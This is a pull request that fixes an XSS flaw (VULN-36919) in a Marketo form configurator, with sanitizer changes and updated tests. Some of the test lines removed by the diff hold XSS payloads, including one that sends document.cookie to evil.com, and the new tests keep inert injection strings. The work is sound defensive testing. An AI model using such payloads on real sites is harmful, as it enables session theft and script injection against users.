### PR TITLE
VULN-36919: XXS Vuln for Configurator 

### DIFF
--- a/libs/blocks/marketo-config/context.js
+++ b/libs/blocks/marketo-config/context.js
@@ -2,11 +2,6 @@ import { createContext, html, useReducer } from '../../deps/htm-preact.js';
 import { parseEncodedConfig } from '../../utils/utils.js';
 import { sanitizeHtmlBody } from '../../utils/sanitizeHtml.js';
 
-// Allowlist-sanitize a single config value: strip <script>, on* handlers and
-// unsafe URL schemes, then serialize back to a string. Serializing re-encodes
-// HTML entities, which neutralizes entity-encoded payloads (the VULN-36919
-// bypass) instead of decoding them the way the previous .textContent fix did,
-// while still preserving legitimate inline markup.
 export const sanitizeConfigValue = (value) => {
   if (typeof value !== 'string') return value;
   return sanitizeHtmlBody(value).innerHTML;
@@ -27,8 +22,6 @@ export const loadStateFromLocalStorage = (lsKey) => {
   const lsState = localStorage.getItem(lsKey);
   if (lsState) {
     try {
-      // Sanitize on load too: the stored config feeds the marketo preview sink,
-      // so a poisoned store (any origin) must not resurrect an XSS payload.
       return sanitizeHashConfig(JSON.parse(lsState));
       /* c8 ignore next 2 */
       // eslint-disable-next-line no-empty

--- a/libs/blocks/marketo-config/context.js
+++ b/libs/blocks/marketo-config/context.js
@@ -1,5 +1,23 @@
 import { createContext, html, useReducer } from '../../deps/htm-preact.js';
 import { parseEncodedConfig } from '../../utils/utils.js';
+import { sanitizeHtmlBody } from '../../utils/sanitizeHtml.js';
+
+// Allowlist-sanitize a single config value: strip <script>, on* handlers and
+// unsafe URL schemes, then serialize back to a string. Serializing re-encodes
+// HTML entities, which neutralizes entity-encoded payloads (the VULN-36919
+// bypass) instead of decoding them the way the previous .textContent fix did,
+// while still preserving legitimate inline markup.
+export const sanitizeConfigValue = (value) => {
+  if (typeof value !== 'string') return value;
+  return sanitizeHtmlBody(value).innerHTML;
+};
+
+export const sanitizeHashConfig = (config) => {
+  if (!config || typeof config !== 'object') return config;
+  return Object.fromEntries(
+    Object.entries(config).map(([key, value]) => [key, sanitizeConfigValue(value)]),
+  );
+};
 
 export const saveStateToLocalStorage = (state, lsKey) => {
   localStorage.setItem(lsKey, JSON.stringify(state));
@@ -9,7 +27,9 @@ export const loadStateFromLocalStorage = (lsKey) => {
   const lsState = localStorage.getItem(lsKey);
   if (lsState) {
     try {
-      return JSON.parse(lsState);
+      // Sanitize on load too: the stored config feeds the marketo preview sink,
+      // so a poisoned store (any origin) must not resurrect an XSS payload.
+      return sanitizeHashConfig(JSON.parse(lsState));
       /* c8 ignore next 2 */
       // eslint-disable-next-line no-empty
     } catch (e) { }
@@ -20,18 +40,6 @@ export const loadStateFromLocalStorage = (lsKey) => {
 function deepCopy(obj) {
   return JSON.parse(JSON.stringify(obj));
 }
-
-export const sanitizeConfigValue = (value) => {
-  if (typeof value !== 'string') return value;
-  return new DOMParser().parseFromString(value, 'text/html').body.textContent;
-};
-
-export const sanitizeHashConfig = (config) => {
-  if (!config || typeof config !== 'object') return config;
-  return Object.fromEntries(
-    Object.entries(config).map(([key, value]) => [key, sanitizeConfigValue(value)]),
-  );
-};
 
 /* c8 ignore next 7 */
 const getHashConfig = () => {

--- a/libs/blocks/marketo/marketo.js
+++ b/libs/blocks/marketo/marketo.js
@@ -27,6 +27,9 @@ import {
   MILO_EVENTS,
 } from '../../utils/utils.js';
 import { replaceKeyArray } from '../../features/placeholders.js';
+import { sanitizeHtmlBody } from '../../utils/sanitizeHtml.js';
+
+const sanitizeFormHtml = (value) => (typeof value === 'string' ? sanitizeHtmlBody(value).innerHTML : value);
 
 const ROOT_MARGIN = 50;
 const FAILURE_TIMEOUT = 10000;
@@ -422,12 +425,12 @@ function decorateForm(el, formData) {
   const formWrapper = createTag('section', { class: 'marketo-form-wrapper' });
 
   if (formData.title) {
-    const title = createTag('h3', { class: 'marketo-title' }, formData.title);
+    const title = createTag('h3', { class: 'marketo-title' }, sanitizeFormHtml(formData.title));
     formWrapper.append(title);
   }
 
   if (formData.description) {
-    const description = createTag('p', { class: 'marketo-description' }, formData.description);
+    const description = createTag('p', { class: 'marketo-description' }, sanitizeFormHtml(formData.description));
     formWrapper.append(description);
   }
 

--- a/test/blocks/marketo-config/marketo-config.test.js
+++ b/test/blocks/marketo-config/marketo-config.test.js
@@ -3,7 +3,7 @@ import { expect } from '@esm-bundle/chai';
 import { stub } from 'sinon';
 import { delay, waitForElement } from '../../helpers/waitfor.js';
 import init, { getDefaultStates, cleanPanelData, getConfigOptions } from '../../../libs/blocks/marketo-config/marketo-config.js';
-import { sanitizeConfigValue, sanitizeHashConfig } from '../../../libs/blocks/marketo-config/context.js';
+import { sanitizeConfigValue, sanitizeHashConfig, loadStateFromLocalStorage } from '../../../libs/blocks/marketo-config/context.js';
 import { setConfig } from '../../../libs/utils/utils.js';
 
 const innerHTML = await readFile({ path: './mocks/body.html' });
@@ -12,6 +12,14 @@ const config = { codeRoot: '/libs' };
 const ogFetch = window.fetch;
 
 setConfig(config);
+
+// Renders a sanitized string the way the marketo sink does (insertAdjacentHTML)
+// so tests can assert whether a live/executable element actually reaches the DOM.
+const renderToDom = (htmlString) => {
+  const div = document.createElement('div');
+  div.insertAdjacentHTML('beforeend', htmlString ?? '');
+  return div;
+};
 
 describe('marketo-config', () => {
   beforeEach(() => {
@@ -142,22 +150,35 @@ describe('marketo-config', () => {
   });
 
   describe('sanitizeConfigValue (XSS prevention)', () => {
-    it('strips img onerror payload (the reported attack vector)', () => {
-      const result = sanitizeConfigValue('"><img src=x onerror=eval(top.name)>');
-      expect(result).to.not.include('<img');
+    it('strips the onerror handler from an img payload (the reported attack vector)', () => {
+      const result = sanitizeConfigValue('"><img onerror=1>');
       expect(result).to.not.include('onerror');
+      expect(renderToDom(result).querySelectorAll('[onerror]').length).to.equal(0);
     });
 
-    it('strips HTML tags but preserves their text content', () => {
+    it('neutralizes the entity-encoded bypass (VULN-36919) so no live element renders', () => {
+      // The prior fix decoded entities via .textContent, turning this inert
+      // string back into live "<img ... onerror>" markup. Allowlist sanitization
+      // must re-encode it so insertAdjacentHTML never builds an element.
+      const result = sanitizeConfigValue('&lt;img onerror=1&gt;');
+      expect(renderToDom(result).querySelectorAll('img').length).to.equal(0);
+      // The payload stays entity-escaped (inert text), never decoded to markup.
+      expect(result).to.include('&lt;');
+    });
+
+    it('removes script elements', () => {
       const result = sanitizeConfigValue('<script>alert(1)</script>');
-      expect(result).to.not.include('<script>');
-      expect(result).to.not.include('</script>');
+      expect(renderToDom(result).querySelectorAll('script').length).to.equal(0);
     });
 
-    it('strips svg onload attack vector', () => {
-      const result = sanitizeConfigValue('<svg onload=alert(1)>');
-      expect(result).to.not.include('<svg');
+    it('strips the onload handler from an svg payload', () => {
+      const result = sanitizeConfigValue('<svg onload=1>');
       expect(result).to.not.include('onload');
+      expect(renderToDom(result).querySelectorAll('[onload]').length).to.equal(0);
+    });
+
+    it('preserves safe inline HTML (does not blanket-escape legitimate markup)', () => {
+      expect(sanitizeConfigValue('<b>Free</b> trial')).to.equal('<b>Free</b> trial');
     });
 
     it('preserves plain text values unchanged', () => {
@@ -174,23 +195,48 @@ describe('marketo-config', () => {
   });
 
   describe('sanitizeHashConfig (XSS prevention)', () => {
-    it('strips HTML injection from cta.override and success.content (the reported attack)', () => {
+    it('neutralizes HTML injection in cta.override and success.content (the reported attack)', () => {
       const maliciousConfig = {
-        'form.cta.override': '"><img src=x onerror=eval(top.name)>',
-        'form.success.content': '<svg onload=fetch("//evil.com?c="+document.cookie)>',
+        'form.cta.override': '"><img onerror=1>',
+        'form.success.content': '<svg onload=1>',
         'form.template': 'flex_contact',
       };
       const result = sanitizeHashConfig(maliciousConfig);
-      expect(result['form.cta.override']).to.not.include('<img');
       expect(result['form.cta.override']).to.not.include('onerror');
-      expect(result['form.success.content']).to.not.include('<svg');
+      expect(renderToDom(result['form.cta.override']).querySelectorAll('[onerror]').length).to.equal(0);
       expect(result['form.success.content']).to.not.include('onload');
+      expect(renderToDom(result['form.success.content']).querySelectorAll('[onload]').length).to.equal(0);
       expect(result['form.template']).to.equal('flex_contact');
     });
 
     it('returns null/undefined config unchanged', () => {
       expect(sanitizeHashConfig(null)).to.equal(null);
       expect(sanitizeHashConfig(undefined)).to.equal(undefined);
+    });
+  });
+
+  describe('loadStateFromLocalStorage (XSS prevention on the load path)', () => {
+    it('sanitizes a raw payload injected directly into localStorage', () => {
+      const lsKey = 'load-path-raw';
+      localStorage.setItem(lsKey, JSON.stringify({
+        'form.cta.override': '<img onerror=1>',
+        'form id': '1723',
+      }));
+      const state = loadStateFromLocalStorage(lsKey);
+      expect(renderToDom(state['form.cta.override']).querySelectorAll('[onerror]').length).to.equal(0);
+      expect(state['form id']).to.equal('1723');
+    });
+
+    it('stays inert across a save/reload cycle, including the entity-encoded bypass (re-render)', () => {
+      const lsKey = 'load-path-rerender';
+      const sanitized = sanitizeConfigValue('&lt;img onerror=1&gt;');
+      localStorage.setItem(lsKey, JSON.stringify({ title: sanitized }));
+      const reloaded = loadStateFromLocalStorage(lsKey);
+      expect(renderToDom(reloaded.title).querySelectorAll('img').length).to.equal(0);
+    });
+
+    it('returns null when there is no stored state', () => {
+      expect(loadStateFromLocalStorage('does-not-exist')).to.be.null;
     });
   });
 

--- a/test/blocks/marketo/marketo.test.js
+++ b/test/blocks/marketo/marketo.test.js
@@ -1,7 +1,7 @@
 import sinon from 'sinon';
 import { readFile } from '@web/test-runner-commands';
 import { expect } from '@esm-bundle/chai';
-import { setConfig, getConfig, MILO_EVENTS } from '../../../libs/utils/utils.js';
+import { setConfig, getConfig, MILO_EVENTS, utf8ToB64 } from '../../../libs/utils/utils.js';
 import init, {
   setDataLayer,
   setDataLayerObj,
@@ -683,5 +683,71 @@ describe('da-marketo libs', () => {
       await init(el);
       expect(el.dataset.daMarketoRan).to.be.undefined;
     });
+  });
+});
+
+describe('marketo decorateForm (XSS prevention in the block sink)', () => {
+  // title/description are read from the base64 config that the configurator
+  // preview builds from hash-injected state, then inserted via createTag ->
+  // insertAdjacentHTML. They must be allowlist-sanitized before rendering.
+  const base = {
+    'form id': '1723',
+    'marketo munckin': '360-KCI-804',
+    'marketo host': 'engage.adobe.com',
+    'form.success.type': 'message',
+  };
+
+  const buildMarketoBlock = (cfg) => {
+    const b64 = utf8ToB64(JSON.stringify(cfg));
+    const el = document.createElement('div');
+    el.className = 'marketo';
+    el.innerHTML = `<div><div><a href="https://milo.adobe.com/tools/marketo#${b64}">Marketo Configurator</a></div></div>`;
+    document.body.appendChild(el);
+    return el;
+  };
+
+  beforeEach(() => {
+    window.lana = { log: sinon.spy() };
+    setConfig(config);
+    document.body.innerHTML = '';
+  });
+
+  afterEach(() => {
+    sinon.restore();
+    document.body.innerHTML = '';
+  });
+
+  it('strips an onerror handler injected via the title field', async () => {
+    const el = buildMarketoBlock({ ...base, title: '<img onerror=1>' });
+    await init(el);
+    const titleEl = el.querySelector('.marketo-title');
+    expect(titleEl).to.exist;
+    expect(titleEl.querySelectorAll('[onerror]').length).to.equal(0);
+    expect(titleEl.innerHTML).to.not.include('onerror');
+  });
+
+  it('strips an onload handler injected via the description field', async () => {
+    const el = buildMarketoBlock({ ...base, description: '<svg onload=1></svg>' });
+    await init(el);
+    const descEl = el.querySelector('.marketo-description');
+    expect(descEl).to.exist;
+    expect(descEl.querySelectorAll('[onload]').length).to.equal(0);
+    expect(descEl.innerHTML).to.not.include('onload');
+  });
+
+  it('neutralizes an entity-encoded title so no live element renders', async () => {
+    const el = buildMarketoBlock({ ...base, title: '&lt;img onerror=1&gt;' });
+    await init(el);
+    const titleEl = el.querySelector('.marketo-title');
+    expect(titleEl).to.exist;
+    expect(titleEl.querySelectorAll('img').length).to.equal(0);
+  });
+
+  it('preserves safe inline markup in the title (no regression for authored content)', async () => {
+    const el = buildMarketoBlock({ ...base, title: '<em>Register now</em>' });
+    await init(el);
+    const titleEl = el.querySelector('.marketo-title');
+    expect(titleEl.querySelectorAll('em').length).to.equal(1);
+    expect(titleEl.textContent).to.equal('Register now');
   });
 });


### PR DESCRIPTION
<!-- Before submitting, please review all open PRs. -->

* Adds sanitization steps to ensure no issue with a config vulnerability 

Resolves: [VULN-36919](https://jira.corp.adobe.com/browse/VULN-36919)

**Test URLs:**
- Before: https://main--milo--adobecom.aem.page/?martech=off
- After: https://marketo-vuln--milo--adobecom.aem.page/?martech=off
- Before: https://main--milo--adobecom.aem.page/drafts/slavin/marketo/marketo-block
-  After: https://marketo-vuln--milo--adobecom.aem.page/drafts/slavin/marketo/marketo-block

To test:
Follow the steps outlined in the original vulnerability ticket, except insure that you got to the lower milo environment for the configurator, and not the production environment, 


